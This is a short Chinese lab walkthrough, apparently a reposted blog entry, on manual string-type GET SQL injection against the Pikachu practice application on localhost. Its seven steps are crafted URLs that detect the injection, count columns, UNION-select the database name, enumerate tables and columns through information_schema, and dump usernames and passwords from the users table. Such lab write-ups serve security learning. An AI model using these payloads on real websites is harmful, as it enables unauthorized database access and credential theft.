码迷,mamicode.com
首页 > 其他好文 > 详细

pikachu-字符型注入(get) #手工注入

时间:2019-10-05 20:40:37      阅读:185      评论:0      收藏:0      [点我收藏+]

标签:username   users   cat   类型   ati   字符型   手工   ast   数据库   

1.检测注入类型

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2    #不报错
http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘&submit=%E6%9F%A5%E8%AF%A2    #报错
http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘--+&submit=%E6%9F%A5%E8%AF%A2    #不报错

 2.判断字段数

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘order by 2--+&submit=%E6%9F%A5%E8%AF%A2

3.暴库

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘UNION SELECT 1,2--+&submit=%E6%9F%A5%E8%AF%A2

4.查数据库

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘UNION SELECT 1,database()--+&submit=%E6%9F%A5%E8%AF%A2

5.查表

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1′ UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2

6.查列

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1′ UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+&submit=%E6%9F%A5%E8%AF%A2

7.查字段内容

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1′ UNION SELECT 1,group_concat(id,username,password) from users --+&submit=%E6%9F%A5%E8%AF%A2

 

#sql语句和post中的数字型注入相同

pikachu-字符型注入(get) #手工注入

标签:username   users   cat   类型   ati   字符型   手工   ast   数据库   

原文地址:https://www.cnblogs.com/Hunter-01001100/p/11624290.html

(0)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!